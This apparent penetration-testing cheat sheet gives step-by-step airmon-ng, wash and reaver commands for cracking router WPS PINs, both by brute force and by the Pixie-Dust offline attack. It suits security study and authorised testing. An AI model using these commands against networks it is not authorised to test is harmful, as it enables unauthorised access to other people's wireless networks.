# WPS
> Wi-Fi Protected Setup (WPS) is a feature supplied with many routers. It is designed to make the process of connecting to a secure wireless network from a computer or other device easier.


## Brute-Force

> WPS can be attacked using a brute-force on the PIN (has only about 11,000 valid combinations).

**1.** Set Wireless adapted to monitor mode.

```bash
airmon-ng start wlan0
```

**2.** Run a tool like _wash_ to identificate candidate WPS enabled networks (note the BSSID and channel).

```bash
wash -i wlan0mon
```

**3.** Use reaver to crack the PIN (care with lockdowns).

```bash
reaver -i wlan0mon -b $BSSID -c $CHANNELNUM -vv
```

**Note:** Reaver is smart enough to remember where it was, and will ask you if you want to resume an interrupted session. So the cracking can be done in a number of sessions.

_____

## Pixiedust

> While the WPS brute force attack has largely been defeated by rate-limiting, we can use a tool called Pixie-Dust, to attempt offline extraction of the pin after recovering just one handshake from the WPS negotiation. We don't need to use the Pixie-Dust tool itself, because Pixie-Dust attack has been integrated into Reaver (using the -K option).

**1.** Set the external antenna into monitoring mode.

```bash
airmon-ng start wlan0
```

**2.** Get the BSSID of the access point

```bash
wash -i wlan0mon
```

**3.** Run reaver over the selected target specifying the Pixie-Dust attack.

```bash
reaver -i wlan0mon -b $BSSID -c $CHANNELNUM -K 1 -vv
```

**4.** Reaver has started its attack. It associates with the AP and then tries a pin of 12345670 and initiates its authentication handshake. If it finds the PIN, Reaver is again invoked with the pin to associate with the AP. If everything is OK, after a couple of minutes Reaver will recover the network key.
